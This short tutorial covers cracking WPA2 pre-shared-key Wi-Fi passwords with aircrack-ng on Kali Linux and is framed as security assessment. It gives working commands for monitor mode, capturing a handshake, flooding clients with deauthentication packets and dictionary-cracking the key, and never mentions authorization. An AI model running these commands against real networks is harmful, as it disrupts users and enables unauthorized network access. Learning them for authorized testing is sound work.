This short tutorial walks you through cracking WPA2 networks which use pre-shared keys using the aircrack-ng suite of tools to assess WI-FI network security. All of the necessary tools come preinstalled with the Kali Linux distribution. The # in front of commands means, that they have to be executed as the root user, e.g. using sudo.

Wireless card into monitor mode

List all possible programs that could interfere with the wireless card. If kill is specified, it will try to kill all of them.

# airmon-ng check kill

Enable monitor mode on an interface (here it’s wlan0) and check if it worked.

# airmon-ng start wlan0
# airmon-ng

Capture handshake

List Wi-Fi networks and their BSSIDs, Channels, etc.

# airodump-ng wlan0mon

Narrow search down to specific BSSID (MAC address).

# airodump-ng wlan0mon -d <BSSID>

Capture WPA2 handshake and write it to file (e.g. handshake-01.cap). Remember to change interface name, if needed.

# airodump-ng -w handshake -c <channel> --bssid <BSSID> wlan0mon

Optional in other terminal: Simultaniously send deauthentication packets to clients on the network to capture WPA2 handshake by forcing clients to reauthenticate. Without this step, it might take some time to capture the handshake.

# aireplay-ng --deauth 0 -a <BSSID> wlan0mon

Crack password

After storing the handshake in e.g. handshake-01.cap, we can finally crack the password using aircrack-ng.

# aircrack-ng handshake-01.cap -w dictionary.txt

Alternatively, we can extract the handshake from the .cap capture file and convert it to a modern hashcat compatible hash file using hashcat.net/cap2hashcat, which can then be cracked using hashcat.